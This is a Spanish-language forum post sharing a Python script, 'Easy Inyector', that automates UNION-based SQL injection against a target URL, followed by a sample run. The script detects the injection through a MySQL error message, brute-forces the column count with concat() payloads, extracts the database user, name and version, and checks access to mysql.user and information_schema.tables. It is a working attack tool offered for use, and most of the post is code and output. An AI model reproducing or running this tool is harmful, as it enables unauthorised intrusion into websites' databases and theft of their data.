[Python] Easy Inyector By Doddy H

Bueno esta es la primera version de este simple programa que hice en perl , en
la siguiente version le agregare otras cosas y podra scanear varios en un archivo de texto.

Esta cosa busca:

* Vulnerabilidad (obvio)
* Limite de columnas
* Informacion sobre la base de datos
* Automaticamente buscar el numero que permite mostrar informacion
* Verifica existencia de mysql.user y information.schema.tables

Código

#!usr/bin/python
#Easy Inyector (C) Doddy Hackman 2010
 
import os,sys,urllib2,re
 
 
def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")
 
 
def header() : 
 print "\n--== Easy Inyector ==--\n"
 
def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 sys.exit(1)
 
def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
 
def toma(web) :
 return urllib2.urlopen(web).read()
 
def bypass(bypass): 
 if bypass == "--":
  return("+","--")
 elif bypass == "/*":
  return("/**/","/*")
 else: 
  return("+","--")
 
def more(web,passx):
 pass1,pass2 = bypass(passx)
 print "\n[+] Searching more data\n"
 web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
 code0 = toma(web1)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on" 
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"
 
def findlength(web,passx): 
 pass1,pass2 = bypass(passx) 
 print "\n[+] Finding columns length"
 number = "concat(0x4b30425241,1,0x4b30425241)"
 for te in range(2,30):
  number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)	
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   sqla = re.sub(numbers[0],"hackman",sqli)
   more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
   print "\n[+] Scan Finished\n"
   sys.exit(1)
 print "[-] Length dont found\n"
 
 
def scan(web,passx):
 pass1,pass2 = bypass(passx) 
 print "\n[+] Testing vulnerability"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
 if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  copyright()
 
 
header()
 
if len(sys.argv) != 2 : 
 show()
 
else :
 try:
  scan(sys.argv[1],"--")
 except:
  copyright()
 
 
#The End

Ejemplo de uso

Código:


C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


--== Easy Inyector ==--


[+] Testing vulnerability
[+] SQLI Detected

[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data

[+] Searching more data

[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41

[+] mysql.user : on
[+] information_schema.tables : on

[+] Scan Finished



(C) Doddy Hackman 2010